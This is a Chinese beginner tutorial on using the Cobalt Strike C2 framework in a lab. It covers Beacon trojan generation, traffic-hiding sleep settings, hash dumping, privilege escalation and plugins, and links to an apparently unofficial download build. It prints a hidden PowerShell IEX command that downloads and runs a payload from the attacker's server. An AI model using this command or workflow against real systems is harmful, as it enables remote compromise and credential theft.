介绍

Cobalt Strike（简称CS）是一款备受推崇的团队作战渗透测试工具，其架构包含客户端与服务端两部分，支持一个服务端对应多个客户端，同时一个客户端也能连接多个服务端，展现出高度的灵活性。

该工具主要用于执行后期持久渗透、实现横向移动、隐藏网络流量以及窃取数据等任务。一旦在目标机器上成功执行CS的payload，便会创建一个具备远控木马功能的Beacon，回连至C2服务器，为渗透测试提供强大的支持。

C/S框架工作原理

本文主要介绍了cs的【工具基本使用】【web投递】【上线后的一些操作】【日志】【插件】【网站克隆】【视图】，很适合刚入坑不久的萌新来使用

基本使用

版本：4.7 中文美化版本，自带插件

下载链接：https://pan.baidu.com/s/1oHl4hCTuIt33OT2EwO-8cQ
提取码：1212

windows/linux通用，linux用来当服务器，这里我使用kali，将工具包中的Cobal_Strike传到kali中即可，找到这个文件，开启cs服务器

启动时候设置本地IP地址和密码，之后就可以看到端口信息

默认用户名为neo，填写相关的信息

添加监听器

添加监听器，因为我已经有了一个，就点了编辑监听器，这是它的每个配置选项

这里添加成功，列表会多出一选项

生成payload，也就是我们的木马可执行程序

选择监听器，就是旁边三个点，然后单机payload选择即可

选择输出格式类型为windows.exe

放进靶机并执行，已上线，确保攻击机和靶机在同一网段下

传文件可以使用python3 -m http.server 开启一个微型的http服务，也可以使用vmware 自带的vmtools

上线成功后，右键会话交互

使用help查看所有的命令

常用的靶机命令都需要使用shell 目标系统命令，

当你执行命令的时候这里有一个会话时间，必须要达到休眠时间才会执行命令，一般都是防止因为流量检测，并不是你卡了

这时候就可以使用sleep 3设置较短时间即可，这样命令就会在3s之后再执行

也可以使用sleep 0设置为实时执行命令，这样命令就会执行的很快但在实战过程中不建议这样使用

web投递

找到攻击菜单栏

选择旁边三个点，按照顺序来

即可添加成功

复制下来就好

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.232:9999/a'))"

这里使用受害者的主机访问这个URL，这里我使用虚拟机进行测试，其实访问后就是一段powershell代码。访问http://192.168.3.232:9999/a

执行命令

可以看到payload为powershell，成功上线

上线后的一些操作

这里使用的靶机为win7，更高版本的windows在这使用默认的配置，可能不生效，因为补丁已经更新，不存在一些常见的漏洞

抓取hash获取系统密码

利用系统漏洞，权限提升，成功提升到系统权限

日志

找到视图下面的web日志

可以看到刚刚我们请求的url地址 ip/a

插件

脚本管理器

找到cs安装目录下的plugin就是第三方脚本插件

每个文件夹代表着一个插件

脚本一般都是cna后缀

这个时候在已经上线的靶机上，右键就会有一个插件，这些插件有编程基础也可以自己写

网站克隆

视图

以上就是最常用的使用方式，当然还有socks代理，之后文章会提到的

---

往期推荐

111